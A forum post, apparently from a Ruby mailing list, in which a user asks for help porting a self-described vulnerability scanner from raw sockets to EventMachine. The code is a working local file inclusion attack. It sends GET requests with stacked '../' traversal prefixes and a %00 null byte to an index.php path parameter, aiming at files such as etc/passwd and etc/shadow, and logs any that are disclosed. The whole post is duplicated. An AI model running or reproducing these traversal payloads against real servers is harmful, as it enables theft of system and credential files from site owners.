B
Bigmac Turdsplash
im working on a vulnerability scanner, basically a http client... i have
a working script that only uses 'socket' but if i was using eventmachine
i would get better performance...
[working-script]
require 'socket'
my_file = File.new("log.txt", 'w')
html = File.new("log.html","w")
IO.foreach("list.lfi") do |block|
host = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
# This is the HTTP request we send to fetch a file
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
socket = TCPSocket.open(host,port) # Connect to server
socket.print(request+"Host: "+host+"\r\n\r\n") # Send
request
response = socket.read # Read complete response
# Split response at first blank line into headers and body
headers,body = response.split("\r\n\r\n", 2)
print request
#print body # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
print 'no inclusion'
else
print 'Please notify site owner of exploit\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[working-script-end]
[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]
this script reads each line from the list then sends out a GET request,
if a config file is found viewable to the public then this will be
logged...
this script does not handle any kind of protocal, its more of a crude
ruff draft... if i could get eventmachine to handle the protocall
performance would increase and script wouldnt crash...
here is my attempt to use eventmachine...
[em-code]
require 'rubygems'
require 'eventmachine'
my_file = File.new("log.txt", 'w')
html = File.new("out.htm","w")
IO.foreach("list.lfi") do |block|
lfihost = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
module DumbHttpClient
def post_init
print request
send_data request
@data = ""
@parsed = false
end
def receive_data data
@data << data
headers,body = data.split("\r\n\r\n", 2)
print data
EventMachine::stop_event_loop
end
end
EventMachine::run {
EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
}
puts "The event loop has ended"
print request
#print body # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
print 'no inclusion'
else
print 'FOUND ONE\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[em-end]
any one with eventmachine expearnce could give me some help... i dont
understand why strings wont exist inside the function.. clueless at this
point
a working script that only uses 'socket' but if i was using eventmachine
i would get better performance...
[working-script]
require 'socket'
my_file = File.new("log.txt", 'w')
html = File.new("log.html","w")
IO.foreach("list.lfi") do |block|
host = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
# This is the HTTP request we send to fetch a file
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
socket = TCPSocket.open(host,port) # Connect to server
socket.print(request+"Host: "+host+"\r\n\r\n") # Send
request
response = socket.read # Read complete response
# Split response at first blank line into headers and body
headers,body = response.split("\r\n\r\n", 2)
print request
#print body # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
print 'no inclusion'
else
print 'Please notify site owner of exploit\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[working-script-end]
[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]
this script reads each line from the list then sends out a GET request,
if a config file is found viewable to the public then this will be
logged...
this script does not handle any kind of protocal, its more of a crude
ruff draft... if i could get eventmachine to handle the protocall
performance would increase and script wouldnt crash...
here is my attempt to use eventmachine...
[em-code]
require 'rubygems'
require 'eventmachine'
my_file = File.new("log.txt", 'w')
html = File.new("out.htm","w")
IO.foreach("list.lfi") do |block|
lfihost = 'www.i8igmac.com' # The web server
port = 80 # Default HTTP port
dir = "../"
mply=0
while mply < 10
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
module DumbHttpClient
def post_init
print request
send_data request
@data = ""
@parsed = false
end
def receive_data data
@data << data
headers,body = data.split("\r\n\r\n", 2)
print data
EventMachine::stop_event_loop
end
end
EventMachine::run {
EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
}
puts "The event loop has ended"
print request
#print body # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
print 'no inclusion'
else
print 'FOUND ONE\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[em-end]
any one with eventmachine expearnce could give me some help... i dont
understand why strings wont exist inside the function.. clueless at this
point